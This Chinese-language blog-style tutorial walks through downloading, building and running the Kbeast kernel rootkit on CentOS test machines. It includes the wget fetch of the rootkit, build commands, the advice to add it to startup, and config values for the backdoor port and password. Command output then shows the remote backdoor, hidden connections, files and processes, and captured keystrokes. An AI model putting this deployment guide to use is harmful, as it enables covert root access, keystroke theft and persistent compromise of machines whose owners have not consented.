内核级rootkit Kbeast的安装与使用
下载地址:https://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/
功能如下:
> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel modules
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit
安装脚本支持的内核版本有2.6.16, 2.6.18, 2.6.32, and 2.6.35。
安装步骤如下:
> wget https://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be user with sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for the recent kernel)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0
需要注意的是重启后就会失效,所以需要加入开机启动中。
CentOS6.5下测试
测试机器内核:
[root@vincent kbeast-v1]# uname -r
2.6.32-431.el6.x86_64
安装提示:
[root@vincent kbeast-v1]# ./setup build
Checking for Kernel Header : [NOT OK] – Please Install!
yum install kernel-devel
但是通过yum升级的话,可能kernel版本和kernel-devel的版本不一致,因为内核没有升级到最新版本。例如
[root@server120 cymothoa-1-beta]# yum list kernel-devel
kernel-devel.x86_64 2.6.32-642.1.1.el6 updates
[root@server120 cymothoa-1-beta]# uname -r
2.6.32-573.18.1.el6.x86_64
所以还需要更新内核
yum install kernel
内核更新完后需要重启才能生效。
继续执行报错:Compiling Kernel Module : [NOT OK]
来看看setup的脚本。
echo -n “Compiling Kernel Module : ”
$MAKEZ > /dev/null 2>&1
IS_EXIST $MOD_KFILE
会先进行编译,然后查看编译后文件中是否有ipsecs-kbeast-v1.ko文件,如果没有该文件就会提示NOT OK,此处编译没有成功。
CentOS5.5下测试
测试机器内核:
[root@localhost _h4x_]# uname -r
2.6.18-409.el5
1)安装
安装成功:
[root@localhost kbeast-v1]# ./setup build 0
Checking for Kernel Beast : [OK]
Checking for sed : /bin/sed
Generating C file from .cc1 : [OK]
Checking for Makefile : [OK]
Checking for Network Daemon : [OK]
Checking for Config File : [OK]
Checking for Kernel Header : [OK]
Checking for gcc : /usr/bin/gcc
Checking for make : /usr/bin/make
Checking for kernel version : [OK]
Creating Install Directory : [OK]
Compiling Kernel Module : [OK]
Compiling Network Daemon File : [OK]
Inserting Loadable Kernel Module : [OK]
Running Network Daemon for Remote Access :
This account is currently not available.
Build Complete!
TO DO : modify init script to load this backdoor at start-up
Example can be found on ./init/ directory
需要注意:
早配置文件config.h中#define _MAGIC_NAME_ “vincent”一定要是一个有/bin/bash的账户。
#define _H4X_PATH_ “/usr/_h4x_” 路径
#define _LOGFILE_ “acctlog” 键盘记录
#define _HIDE_PORT_ 13377 后门端口
#define _RPASSWORD_ “h4x3d” 后门密码
2)后门连接
使用nmap扫描,发现13377端口开放
[root@vincent ~]# nmap -p- 172.16.100.153
Starting Nmap 5.51 ( https://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown
直接使用telnet连接后门
3)连接隐藏
使用netstat查看,连接是隐藏的
[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#
4)文件隐藏
/usr/_h4x_是隐藏的,ll无法查看,可以cd到这个目录下
[root@localhost usr]# ll /usr/
总计 216
drwxr-xr-x 2 root root 49152 03-23 01:24 bin
drwxr-xr-x 2 root root 4096 2010-01-27 etc
drwxr-xr-x 2 root root 4096 2010-01-27 games
drwxr-xr-x 37 root root 4096 03-23 00:40 include
drwxr-xr-x 6 root root 4096 03-22 23:13 kerberos
drwxr-xr-x 67 root root 20480 03-23 01:24 lib
drwxr-xr-x 94 root root 40960 03-23 01:24 lib64
drwxr-xr-x 10 root root 4096 03-23 01:24 libexec
drwxr-xr-x 12 root root 4096 03-22 23:12 local
drwxr-xr-x 2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root 4096 03-22 23:31 share
drwxr-xr-x 4 root root 4096 03-22 23:12 src
lrwxrwxrwx 1 root root 10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x 3 root root 4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0 config.h ipsecs-kbeast-v1.cc1 ipsecs-kbeast-v1.mod.o Makefile README.TXT
acctlog.500 init ipsecs-kbeast-v1.ko ipsecs-kbeast-v1.o Module.markers setup
bd-ipsecs-kbeast-v1.c ipsecs-kbeast-v1.c ipsecs-kbeast-v1.mod.c LICENSE Module.symvers
5)键盘记录
[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] – [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] – [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] – [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] – [UID = 0 ] bash > ps -ef
6)进程隐藏
直接ps查看无法看到该进程,但是可以grep可以看到。
[root@localhost _h4x_]# ps xua | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd
将ps aux重定向到文件中,也可以看到。
[root@localhost _h4x_]# ps xua > /tmp/ps.txt
[root@localhost _h4x_]# cat /tmp/ps.txt | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd
